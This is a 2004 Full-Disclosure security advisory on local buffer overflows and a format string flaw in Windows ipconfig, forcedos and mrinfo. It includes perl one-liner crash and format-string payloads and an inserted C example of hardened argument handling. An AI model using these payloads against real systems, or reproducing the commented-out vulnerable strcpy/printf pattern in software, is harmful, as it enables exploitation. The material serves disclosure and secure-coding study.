Full Disclosure: Microsoft Windows cmd line tools BOFs

From: Martin Eiszner <m.eiszner_at_sec-consult.com>
Date: Wed, 17 Nov 2004 09:02:36 +0100

========================================
Microsoft command-line tools BOFs
========================================

Product: Windows-2000 SP4 / Windows-XP SP2

Vulnerabilities:

- Buffer Overflow (no privilege escalation)

Vendor: Microsoft (http://www.microsoft.com/)
Vendor-Status: vendor contacted (between 2002 and 2003)
Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available

Objects: ipconfig.exe / forcedos.exe / mrinfo.exe

Exploitable:
Local: PARTIAL
Remote: NO

============
Introduction
============

---
=====================
Vulnerability Details
=====================
1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
=======================================================
OBJECTS:
ipconfig.exe (only Windows-2000 SP4)
forcedos.exe
mrinfo.exe
DESCRIPTION:
Insufficient input validation leads to a) stack-based buffer overflows and b) format string vulnerabilities.
EXAMPLES:
a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'`
b) forcedos.exe `perl -e 'print "A"x6784;'`
c) mrinfo.exe -i `perl -e 'print "A"x60;'`
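The three examples above exercise two classic bug classes: an unchecked copy of a command-line argument into a fixed stack buffer (b and c), and an argument that ends up being used as the printf format string (a, with its "%08x" run and trailing "%n"). The following C program is an added, hypothetical example and not the source of ipconfig.exe, forcedos.exe or mrinfo.exe; it shows the safe handling a tool of this kind needs, with the vulnerable pattern left in a comment and the buffer size, switch name and return codes all assumed for illustration. Inputs modelled on the advisory's perl one-liners are constructed inside the program.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical size of a tool's fixed stack buffer for one switch. */
#define OPT_MAX 64

enum { OPT_OK = 0, OPT_UNKNOWN = 1, OPT_TOO_LONG = 2 };

/*
 * The pattern the advisory describes, kept as a comment so the file compiles
 * cleanly (hypothetical; not the tools' actual source):
 *
 *     char opt[OPT_MAX];
 *     strcpy(opt, arg);   // (a) stack-based overflow: no length check
 *     printf(arg);        // (b) format string: "%08x"/"%n" in arg are interpreted
 */

/* Length of s, scanning at most limit bytes, so a huge argv entry is never walked to its end. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened copy: refuse anything that does not fit together with its NUL. */
int copy_option(const char *arg, char *dst, size_t dstsz)
{
    size_t n = bounded_len(arg, dstsz);
    if (n >= dstsz)
        return OPT_TOO_LONG;
    memcpy(dst, arg, n + 1);
    return OPT_OK;
}

/* Hardened message: arg is a %s parameter, never the format string, so
 * "%n" or "%08x" inside it are printed literally, not interpreted. */
int format_unknown_option(const char *arg, char *msg, size_t msgsz)
{
    int r = snprintf(msg, msgsz, "Unknown option: %s", arg);
    if (r < 0 || (size_t)r >= msgsz)
        return OPT_TOO_LONG;   /* snprintf truncated; report it rather than trust the result */
    return OPT_OK;
}

/* Full hardened path for one switch: OPT_OK if recognised, OPT_UNKNOWN if it
 * was safely reported as unknown, OPT_TOO_LONG if rejected up front. */
int handle_option(const char *arg)
{
    char opt[OPT_MAX];
    char msg[OPT_MAX + 32];
    int rc = copy_option(arg, opt, sizeof opt);
    if (rc != OPT_OK)
        return rc;
    if (strcmp(opt, "/all") == 0)       /* hypothetical recognised switch */
        return OPT_OK;
    if (format_unknown_option(opt, msg, sizeof msg) != OPT_OK)
        return OPT_TOO_LONG;
    return OPT_UNKNOWN;
}

/* Build an n-byte argument of one repeated character (constructed here, in the
 * style of the advisory's perl -e 'print "A"x6784') and handle it. */
int handle_repeated(char c, size_t n)
{
    char *arg = malloc(n + 1);
    int rc;
    if (arg == NULL)
        return -1;
    memset(arg, c, n);
    arg[n] = '\0';
    rc = handle_option(arg);
    free(arg);
    return rc;
}

/* 1 if the rendered message for arg is exactly expected, else 0. */
int message_is_literal(const char *arg, const char *expected)
{
    char msg[OPT_MAX + 32];
    if (format_unknown_option(arg, msg, sizeof msg) != OPT_OK)
        return 0;
    return strcmp(msg, expected) == 0;
}

int main(void)
{
    printf("/all          -> %d\n", handle_option("/all"));
    printf("60 x 'A'      -> %d\n", handle_repeated('A', 60));
    printf("6784 x 'A'    -> %d\n", handle_repeated('A', 6784));
    printf("literal %%n   -> %d\n",
           message_is_literal("%08x%n", "Unknown option: %08x%n"));
    return 0;
}
```

The two fixes are independent: bounding the copy stops the stack overflow regardless of what the bytes are, and passing the argument through "%s" stops the format string bug regardless of how long it is. A tool that does only one of the two is still exposed to the other class.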
===============
GENERAL REMARKS
===============
Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html).
It is unlikely that you can gain access or elevate privileges through "forcedos.exe" and "mrinfo.exe".
Nevertheless, it might be possible to misuse "ipconfig.exe" in a "restricted" environment with DHCP enabled!!
====================
Recommended Hotfixes
====================
---
EOF @2003 Brereton_paul_at_btinternet.com,m.eiszner_at_sec-consult.com
=======
Contact
=======
SEC-CONSULT
UK / EUROPE
Austria / EUROPE
Brereton_paul_at_btinternet.com
m.eiszner_at_sec-consult.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Nov 17 2004